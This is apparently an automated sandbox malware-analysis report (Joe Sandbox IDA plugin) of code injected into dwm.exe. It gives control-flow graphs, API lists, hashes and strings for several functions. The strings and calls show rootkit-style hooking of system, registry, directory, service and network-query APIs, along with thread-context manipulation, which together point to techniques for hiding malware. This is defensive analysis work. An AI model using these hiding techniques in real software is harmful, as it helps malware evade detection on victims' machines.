                        control_flow_graph 59 26db1675b30-26db1675b57 60 26db1675b6b-26db1675b76 GetCurrentThreadId 59->60 61 26db1675b59-26db1675b68 59->61 62 26db1675b82-26db1675b89 60->62 63 26db1675b78-26db1675b7d 60->63 61->60 65 26db1675b9b-26db1675baf 62->65 66 26db1675b8b-26db1675b96 call 26db1675960 62->66 64 26db1675faf-26db1675fc6 call 26db1677940 63->64 69 26db1675bbe-26db1675bc4 65->69 66->64 70 26db1675bca-26db1675bd3 69->70 71 26db1675c95-26db1675cb6 69->71 74 26db1675c1a-26db1675c8d call 26db1674510 call 26db16744b0 call 26db1674470 70->74 75 26db1675bd5-26db1675c18 call 26db16785c0 70->75 79 26db1675e1f-26db1675e30 call 26db16774bf 71->79 80 26db1675cbc-26db1675cdc GetThreadContext 71->80 87 26db1675c90 74->87 75->87 93 26db1675e35-26db1675e3b 79->93 84 26db1675ce2-26db1675d03 80->84 85 26db1675e1a 80->85 84->85 90 26db1675d09-26db1675d12 84->90 85->79 87->69 94 26db1675d14-26db1675d25 90->94 95 26db1675d92-26db1675da3 90->95 97 26db1675e41-26db1675e98 VirtualProtect FlushInstructionCache 93->97 98 26db1675efe-26db1675f0e 93->98 101 26db1675d8d 94->101 102 26db1675d27-26db1675d3c 94->102 103 26db1675e15 95->103 104 26db1675da5-26db1675dc3 95->104 99 26db1675e9a-26db1675ea4 97->99 100 26db1675ec9-26db1675ef9 call 26db16778ac 97->100 105 26db1675f10-26db1675f17 98->105 106 26db1675f1e-26db1675f2a call 26db1674df0 98->106 99->100 108 26db1675ea6-26db1675ec1 call 26db1674390 99->108 100->93 101->103 102->101 110 26db1675d3e-26db1675d88 call 26db1673970 SetThreadContext 102->110 104->103 111 26db1675dc5-26db1675e0c call 26db1673900 104->111 105->106 112 26db1675f19 call 26db16743e0 105->112 123 26db1675f2f-26db1675f35 106->123 108->100 110->101 111->103 124 26db1675e10 call 26db16774dd 111->124 112->106 125 26db1675f77-26db1675f95 123->125 126 26db1675f37-26db1675f75 ResumeThread call 26db16778ac 123->126 124->103 128 26db1675fa9 125->128 129 26db1675f97-26db1675fa6 125->129 126->123 128->64 129->128
                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: Thread$Current$Context
                        • String ID:
                        • API String ID: 1666949209-0
                        • Opcode ID: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                        • Instruction ID: 843d86674cc97658883fe1d0c57f2d78ce8a5df95176ad36f675bd71f88513af
                        • Opcode Fuzzy Hash: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                        • Instruction Fuzzy Hash: 1DD1AA36705B88C2DB709B0AE89835A77A0F389B98F114256EEDD47BA9DF3DC541CB40
                        Function 0000026DB16750D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 131 26db16750d0-26db16750fc 132 26db16750fe-26db1675106 131->132 133 26db167510d-26db1675116 131->133 132->133 134 26db1675118-26db1675120 133->134 135 26db1675127-26db1675130 133->135 134->135 136 26db1675132-26db167513a 135->136 137 26db1675141-26db167514a 135->137 136->137 138 26db167514c-26db1675151 137->138 139 26db1675156-26db1675161 GetCurrentThreadId 137->139 140 26db16756d3-26db16756da 138->140 141 26db1675163-26db1675168 139->141 142 26db167516d-26db1675174 139->142 141->140 143 26db1675181-26db167518a 142->143 144 26db1675176-26db167517c 142->144 145 26db167518c-26db1675191 143->145 146 26db1675196-26db16751a2 143->146 144->140 145->140 147 26db16751a4-26db16751c9 146->147 148 26db16751ce-26db1675225 call 26db16756e0 * 2 146->148 147->140 153 26db167523a-26db1675243 148->153 154 26db1675227-26db167522e 148->154 157 26db1675255-26db167525e 153->157 158 26db1675245-26db1675252 153->158 155 26db1675230 154->155 156 26db1675236 154->156 159 26db16752b0-26db16752b6 155->159 156->153 160 26db16752a6-26db16752aa 156->160 161 26db1675273-26db1675298 call 26db1677870 157->161 162 26db1675260-26db1675270 157->162 158->157 164 26db16752b8-26db16752d4 call 26db1674390 159->164 165 26db16752e5-26db16752eb 159->165 160->159 171 26db167529e 161->171 172 26db167532d-26db1675342 call 26db1673cc0 161->172 162->161 164->165 176 26db16752d6-26db16752de 164->176 166 26db16752ed-26db167530c call 26db16778ac 165->166 167 26db1675315-26db1675328 165->167 166->167 167->140 171->160 178 26db1675344-26db167534c 172->178 179 26db1675351-26db167535a 172->179 176->165 178->160 180 26db167536c-26db16753ba call 26db1678c60 179->180 181 26db167535c-26db1675369 179->181 184 26db16753c2-26db16753ca 180->184 181->180 185 26db16753d0-26db16754bb call 26db1677440 184->185 186 26db16754d7-26db16754df 184->186 198 26db16754bf-26db16754ce call 26db1674060 185->198 199 26db16754bd 185->199 188 26db1675523-26db167552b 186->188 189 26db16754e1-26db16754f4 call 26db1674590 186->189 191 26db167552d-26db1675535 188->191 192 26db1675537-26db1675546 188->192 200 26db16754f8-26db1675521 189->200 201 26db16754f6 189->201 191->192 195 26db1675554-26db1675561 191->195 196 26db167554f 192->196 197 26db1675548 192->197 202 26db1675564-26db16755b9 call 26db16785c0 195->202 203 26db1675563 195->203 196->195 197->196 208 26db16754d2 198->208 209 26db16754d0 198->209 199->186 200->186 201->188 210 26db16755bb-26db16755c3 202->210 211 26db16755c8-26db1675661 call 26db1674510 call 26db1674470 VirtualProtect 202->211 203->202 208->184 209->186 216 26db1675663-26db1675668 GetLastError 211->216 217 26db1675671-26db16756d1 211->217 216->217 217->140
                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: CurrentThread
                        • String ID:
                        • API String ID: 2882836952-0
                        • Opcode ID: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                        • Instruction ID: b89488e72139483f15850ce0627679f5db94ed58393c5abb01e1e75090cb23dc
                        • Opcode Fuzzy Hash: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                        • Instruction Fuzzy Hash: D602CA32619B8886EB60CB55F89835AB7A0F3C5798F214115EA9E87BACDF7DC444CB40
                        Function 0000026DB16739E0 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: Virtual$AllocQuery
                        • String ID:
                        • API String ID: 31662377-0
                        • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                        • Instruction ID: 514a14e89455809bd5bd7bcc7831bad33432b67c68047ea4c118eadd231905df
                        • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                        • Instruction Fuzzy Hash: E931F432F19A8881EA70EB15E85935E66A4F38878CF110725FDCD46B9CDF7EC6408B84
                        Function 0000026DB167328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                        • String ID:
                        • API String ID: 1683269324-0
                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                        • Instruction ID: c1da28291e4c46b1bed6e3a72131b0d813ed707056273a2e634cae2ad9a90ae6
                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                        • Instruction Fuzzy Hash: C6118C31F1568C82FB70AB21FD0D36922A4AB5835DF524329DE4A8169DEF7BC24886C0
                        Function 0000026DB1674DF0 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                        • String ID:
                        • API String ID: 3733156554-0
                        • Opcode ID: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                        • Instruction ID: 3cd728b104b029a5c99facff4c4f26c68678a1ff6bf2ecf97b09fe41d434a4f4
                        • Opcode Fuzzy Hash: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                        • Instruction Fuzzy Hash: 68F0D036719B08C1D630DB05E85975AABA0F3887E8F154615FE8D47B6DCE3EC6908B80
                        Function 0000026DB15B273C Relevance: 3.2, APIs: 2, Instructions: 187memorylibraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 265 26db15b273c-26db15b27a4 call 26db15b29d4 * 4 274 26db15b27aa-26db15b27ad 265->274 275 26db15b29b2 265->275 274->275 276 26db15b27b3-26db15b27b6 274->276 277 26db15b29b4-26db15b29d0 275->277 276->275 278 26db15b27bc-26db15b27bf 276->278 278->275 279 26db15b27c5-26db15b27e6 VirtualAlloc 278->279 279->275 280 26db15b27ec-26db15b280c 279->280 281 26db15b2838-26db15b283f 280->281 282 26db15b280e-26db15b2836 280->282 283 26db15b2845-26db15b2852 281->283 284 26db15b28df-26db15b28e6 281->284 282->281 282->282 283->284 287 26db15b2858-26db15b286a LoadLibraryA 283->287 285 26db15b28ec-26db15b2901 284->285 286 26db15b2992-26db15b29b0 284->286 285->286 288 26db15b2907 285->288 286->277 289 26db15b286c-26db15b2878 287->289 290 26db15b28ca-26db15b28d2 287->290 293 26db15b290d-26db15b2921 288->293 294 26db15b28c5-26db15b28c8 289->294 290->287 291 26db15b28d4-26db15b28d9 290->291 291->284 296 26db15b2923-26db15b2934 293->296 297 26db15b2982-26db15b298c 293->297 294->290 295 26db15b287a-26db15b287d 294->295 301 26db15b28a7-26db15b28b7 295->301 302 26db15b287f-26db15b28a5 295->302 299 26db15b2936-26db15b293d 296->299 300 26db15b293f-26db15b2943 296->300 297->286 297->293 303 26db15b2970-26db15b2980 299->303 304 26db15b2945-26db15b294b 300->304 305 26db15b294d-26db15b2951 300->305 306 26db15b28ba-26db15b28c1 301->306 302->306 303->296 303->297 304->303 307 26db15b2963-26db15b2967 305->307 308 26db15b2953-26db15b2961 305->308 306->294 307->303 310 26db15b2969-26db15b296c 307->310 308->303 310->303
                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746673900.0000026DB15B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15B0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db15b0000_dwm.jbxd
                        Similarity
                        • API ID: AllocLibraryLoadVirtual
                        • String ID:
                        • API String ID: 3550616410-0
                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                        • Instruction ID: 704898ec6948a2b12555e552dbb8ff9f12bb3bee1bb8d44bc6a3711bb5236a1e
                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                        • Instruction Fuzzy Hash: FF61CE32B0169C87EB548F15980873AB3E2F754BE8F598125EE5D07788DB39E893C724
                        Function 0000026DB1671ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 0000026DB1671628: GetProcessHeap.KERNEL32 ref: 0000026DB1671633
                          • Part of subcall function 0000026DB1671628: HeapAlloc.KERNEL32 ref: 0000026DB1671642
                          • Part of subcall function 0000026DB1671628: RegOpenKeyExW.ADVAPI32 ref: 0000026DB16716B2
                          • Part of subcall function 0000026DB1671628: RegOpenKeyExW.ADVAPI32 ref: 0000026DB16716DF
                          • Part of subcall function 0000026DB1671628: RegCloseKey.ADVAPI32 ref: 0000026DB16716F9
                          • Part of subcall function 0000026DB1671628: RegOpenKeyExW.ADVAPI32 ref: 0000026DB1671719
                          • Part of subcall function 0000026DB1671628: RegCloseKey.ADVAPI32 ref: 0000026DB1671734
                          • Part of subcall function 0000026DB1671628: RegOpenKeyExW.ADVAPI32 ref: 0000026DB1671754
                          • Part of subcall function 0000026DB1671628: RegCloseKey.ADVAPI32 ref: 0000026DB167176F
                          • Part of subcall function 0000026DB1671628: RegOpenKeyExW.ADVAPI32 ref: 0000026DB167178F
                          • Part of subcall function 0000026DB1671628: RegCloseKey.ADVAPI32 ref: 0000026DB16717AA
                          • Part of subcall function 0000026DB1671628: RegOpenKeyExW.ADVAPI32 ref: 0000026DB16717CA
                        • Sleep.KERNEL32 ref: 0000026DB1671AD7
                        • SleepEx.KERNELBASE ref: 0000026DB1671ADD
                          • Part of subcall function 0000026DB1671628: RegCloseKey.ADVAPI32 ref: 0000026DB16717E5
                          • Part of subcall function 0000026DB1671628: RegOpenKeyExW.ADVAPI32 ref: 0000026DB1671805
                          • Part of subcall function 0000026DB1671628: RegCloseKey.ADVAPI32 ref: 0000026DB1671820
                          • Part of subcall function 0000026DB1671628: RegOpenKeyExW.ADVAPI32 ref: 0000026DB1671840
                          • Part of subcall function 0000026DB1671628: RegCloseKey.ADVAPI32 ref: 0000026DB167185B
                          • Part of subcall function 0000026DB1671628: RegOpenKeyExW.ADVAPI32 ref: 0000026DB167187B
                          • Part of subcall function 0000026DB1671628: RegCloseKey.ADVAPI32 ref: 0000026DB1671896
                          • Part of subcall function 0000026DB1671628: RegCloseKey.ADVAPI32 ref: 0000026DB16718A0
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: CloseOpen$HeapSleep$AllocProcess
                        • String ID:
                        • API String ID: 1534210851-0
                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                        • Instruction ID: 412db2072bf8229ff69195498fa334a25a9ab84462f24d848b41469eccab06f3
                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                        • Instruction Fuzzy Hash: 743123B1B00649C2FF50DF26DE593B913A4AB98FD8F0A56238E09872DDFF12C451C290

                        Non-executed Functions

                        Function 0000026DB1672B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 575 26db1672b2c-26db1672ba5 call 26db1692ce0 578 26db1672ee0-26db1672f03 575->578 579 26db1672bab-26db1672bb1 575->579 579->578 580 26db1672bb7-26db1672bba 579->580 580->578 581 26db1672bc0-26db1672bc3 580->581 581->578 582 26db1672bc9-26db1672bd9 GetModuleHandleA 581->582 583 26db1672bed 582->583 584 26db1672bdb-26db1672beb GetProcAddress 582->584 585 26db1672bf0-26db1672c0e 583->585 584->585 585->578 587 26db1672c14-26db1672c33 StrCmpNIW 585->587 587->578 588 26db1672c39-26db1672c3d 587->588 588->578 589 26db1672c43-26db1672c4d 588->589 589->578 590 26db1672c53-26db1672c5a 589->590 590->578 591 26db1672c60-26db1672c73 590->591 592 26db1672c83 591->592 593 26db1672c75-26db1672c81 591->593 594 26db1672c86-26db1672c8a 592->594 593->594 595 26db1672c8c-26db1672c98 594->595 596 26db1672c9a 594->596 597 26db1672c9d-26db1672ca7 595->597 596->597 598 26db1672d9d-26db1672da1 597->598 599 26db1672cad-26db1672cb0 597->599 600 26db1672ed2-26db1672eda 598->600 601 26db1672da7-26db1672daa 598->601 602 26db1672cc2-26db1672ccc 599->602 603 26db1672cb2-26db1672cbf call 26db167199c 599->603 600->578 600->591 604 26db1672dac-26db1672db8 call 26db167199c 601->604 605 26db1672dbb-26db1672dc5 601->605 607 26db1672d00-26db1672d0a 602->607 608 26db1672cce-26db1672cdb 602->608 603->602 604->605 612 26db1672dc7-26db1672dd4 605->612 613 26db1672df5-26db1672df8 605->613 609 26db1672d0c-26db1672d19 607->609 610 26db1672d3a-26db1672d3d 607->610 608->607 615 26db1672cdd-26db1672cea 608->615 609->610 616 26db1672d1b-26db1672d28 609->616 617 26db1672d3f-26db1672d49 call 26db1671bbc 610->617 618 26db1672d4b-26db1672d58 lstrlenW 610->618 612->613 620 26db1672dd6-26db1672de3 612->620 621 26db1672dfa-26db1672e03 call 26db1671bbc 613->621 622 26db1672e05-26db1672e12 lstrlenW 613->622 623 26db1672ced-26db1672cf3 615->623 626 26db1672d2b-26db1672d31 616->626 617->618 632 26db1672d93-26db1672d98 617->632 628 26db1672d7b-26db1672d8d call 26db1673844 618->628 629 26db1672d5a-26db1672d64 618->629 630 26db1672de6-26db1672dec 620->630 621->622 641 26db1672e4a-26db1672e55 621->641 624 26db1672e14-26db1672e1e 622->624 625 26db1672e35-26db1672e3f call 26db1673844 622->625 623->632 633 26db1672cf9-26db1672cfe 623->633 624->625 634 26db1672e20-26db1672e33 call 26db167152c 624->634 635 26db1672e42-26db1672e44 625->635 626->632 636 26db1672d33-26db1672d38 626->636 628->632 628->635 629->628 639 26db1672d66-26db1672d79 call 26db167152c 629->639 640 26db1672dee-26db1672df3 630->640 630->641 632->635 633->607 633->623 634->625 634->641 635->600 635->641 636->610 636->626 639->628 639->632 640->613 640->630 647 26db1672ecc-26db1672ed0 641->647 648 26db1672e57-26db1672e5b 641->648 647->600 651 26db1672e63-26db1672e7d call 26db16785c0 648->651 652 26db1672e5d-26db1672e61 648->652 654 26db1672e80-26db1672e83 651->654 652->651 652->654 656 26db1672ea6-26db1672ea9 654->656 657 26db1672e85-26db1672ea3 call 26db16785c0 654->657 656->647 660 26db1672eab-26db1672ec9 call 26db16785c0 656->660 657->656 660->647
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                        • API String ID: 2119608203-3850299575
                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                        • Instruction ID: 13ca0a463e51e1150cf6cae80a107a988cd7bba390a73246de8c0d59a73ccc38
                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                        • Instruction Fuzzy Hash: 51B1B172B10A9882EBA4CF25CC487A963A5F744B8CF56521AEE495379CDF36CC80C7C0
                        Function 0000026DB1677D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                        • String ID:
                        • API String ID: 3140674995-0
                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                        • Instruction ID: 9b3698264559ceb9ab7f126f0999cdc689ae2943471866efe597d9dbf9fd7fd1
                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                        • Instruction Fuzzy Hash: FF31A972704B848AEB608F60E8983EE7360F794708F45452ADB4E47B98EF3AC648C740
                        Function 0000026DB167D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                        • String ID:
                        • API String ID: 1239891234-0
                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                        • Instruction ID: d4858ab6b594ffbafe51a02d34d190278b553c25c1bba8a9609db547e092d85c
                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                        • Instruction Fuzzy Hash: AC315E32714B8486EB60CF25EC483AE73A4F799768F510226EE9D47B98EF39C545CB40
                        Function 0000026DB16712BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                        • String ID: d
                        • API String ID: 2005889112-2564639436
                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                        • Instruction ID: 4ec10fdf5898cec52b9fc58856d0a220b6ffad920313d5bf61f13301b79789d7
                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                        • Instruction Fuzzy Hash: B9514A36B00B8886EB54CF66E94835A77A1F798F99F054126DE890772DEF3DC049C780
                        Function 0000026DB1671D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: CurrentThread$AddressHandleModuleProc
                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                        • API String ID: 4175298099-1975688563
                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                        • Instruction ID: 3455a8e4cfdd6f64cd38f3b2ef82d73cf3a312a98173465fe80c84695968cfb3
                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                        • Instruction Fuzzy Hash: E931C3B4F00A4EE1EA00EFA9EC697E42360B71478CF924257D8595216D9F3A8A49C3E0
                        Function 0000026DB15B6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 417 26db15b6910-26db15b6916 418 26db15b6918-26db15b691b 417->418 419 26db15b6951-26db15b695b 417->419 421 26db15b6945-26db15b6984 call 26db15b6fc0 418->421 422 26db15b691d-26db15b6920 418->422 420 26db15b6a78-26db15b6a8d 419->420 426 26db15b6a9c-26db15b6ab6 call 26db15b6e54 420->426 427 26db15b6a8f 420->427 440 26db15b698a-26db15b699f call 26db15b6e54 421->440 441 26db15b6a52 421->441 424 26db15b6938 __scrt_dllmain_crt_thread_attach 422->424 425 26db15b6922-26db15b6925 422->425 429 26db15b693d-26db15b6944 424->429 431 26db15b6927-26db15b6930 425->431 432 26db15b6931-26db15b6936 call 26db15b6f04 425->432 438 26db15b6ab8-26db15b6aed call 26db15b6f7c call 26db15b6e1c call 26db15b7318 call 26db15b7130 call 26db15b7154 call 26db15b6fac 426->438 439 26db15b6aef-26db15b6b20 call 26db15b7190 426->439 433 26db15b6a91-26db15b6a9b 427->433 432->429 438->433 449 26db15b6b22-26db15b6b28 439->449 450 26db15b6b31-26db15b6b37 439->450 452 26db15b69a5-26db15b69b6 call 26db15b6ec4 440->452 453 26db15b6a6a-26db15b6a77 call 26db15b7190 440->453 444 26db15b6a54-26db15b6a69 441->444 449->450 454 26db15b6b2a-26db15b6b2c 449->454 455 26db15b6b39-26db15b6b43 450->455 456 26db15b6b7e-26db15b6b94 call 26db15b268c 450->456 471 26db15b69b8-26db15b69dc call 26db15b72dc call 26db15b6e0c call 26db15b6e38 call 26db15bac0c 452->471 472 26db15b6a07-26db15b6a11 call 26db15b7130 452->472 453->420 460 26db15b6c1f-26db15b6c2c 454->460 461 26db15b6b45-26db15b6b4d 455->461 462 26db15b6b4f-26db15b6b5d call 26db15c5780 455->462 474 26db15b6b96-26db15b6b98 456->474 475 26db15b6bcc-26db15b6bce 456->475 468 26db15b6b63-26db15b6b78 call 26db15b6910 461->468 462->468 484 26db15b6c15-26db15b6c1d 462->484 468->456 468->484 471->472 520 26db15b69de-26db15b69e5 __scrt_dllmain_after_initialize_c 471->520 472->441 493 26db15b6a13-26db15b6a1f call 26db15b7180 472->493 474->475 481 26db15b6b9a-26db15b6bbc call 26db15b268c call 26db15b6a78 474->481 482 26db15b6bd5-26db15b6bea call 26db15b6910 475->482 483 26db15b6bd0-26db15b6bd3 475->483 481->475 514 26db15b6bbe-26db15b6bc6 call 26db15c5780 481->514 482->484 502 26db15b6bec-26db15b6bf6 482->502 483->482 483->484 484->460 504 26db15b6a45-26db15b6a50 493->504 505 26db15b6a21-26db15b6a2b call 26db15b7098 493->505 508 26db15b6bf8-26db15b6bff 502->508 509 26db15b6c01-26db15b6c11 call 26db15c5780 502->509 504->444 505->504 519 26db15b6a2d-26db15b6a3b 505->519 508->484 509->484 514->475 519->504 520->472 521 26db15b69e7-26db15b6a04 call 26db15babc8 520->521 521->472
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746673900.0000026DB15B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15B0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db15b0000_dwm.jbxd
                        Similarity
                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                        • API String ID: 190073905-1786718095
                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                        • Instruction ID: 196aad8575f1ee3d1c37c55aaf84a8b607eeb7ed88bf68c6814e311fd5fb6855
                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                        • Instruction Fuzzy Hash: A081B031F1024D8AFA509F669C493BB62F1EB8578CF5680259905877DEDF7BC845870C
                        Function 0000026DB167CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • GetLastError.KERNEL32 ref: 0000026DB167CE37
                        • FlsGetValue.KERNEL32(?,?,?,0000026DB1680A6B,?,?,?,0000026DB168045C,?,?,?,0000026DB167C84F), ref: 0000026DB167CE4C
                        • FlsSetValue.KERNEL32(?,?,?,0000026DB1680A6B,?,?,?,0000026DB168045C,?,?,?,0000026DB167C84F), ref: 0000026DB167CE6D
                        • FlsSetValue.KERNEL32(?,?,?,0000026DB1680A6B,?,?,?,0000026DB168045C,?,?,?,0000026DB167C84F), ref: 0000026DB167CE9A
                        • FlsSetValue.KERNEL32(?,?,?,0000026DB1680A6B,?,?,?,0000026DB168045C,?,?,?,0000026DB167C84F), ref: 0000026DB167CEAB
                        • FlsSetValue.KERNEL32(?,?,?,0000026DB1680A6B,?,?,?,0000026DB168045C,?,?,?,0000026DB167C84F), ref: 0000026DB167CEBC
                        • SetLastError.KERNEL32 ref: 0000026DB167CED7
                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,0000026DB1680A6B,?,?,?,0000026DB168045C,?,?,?,0000026DB167C84F), ref: 0000026DB167CF0D
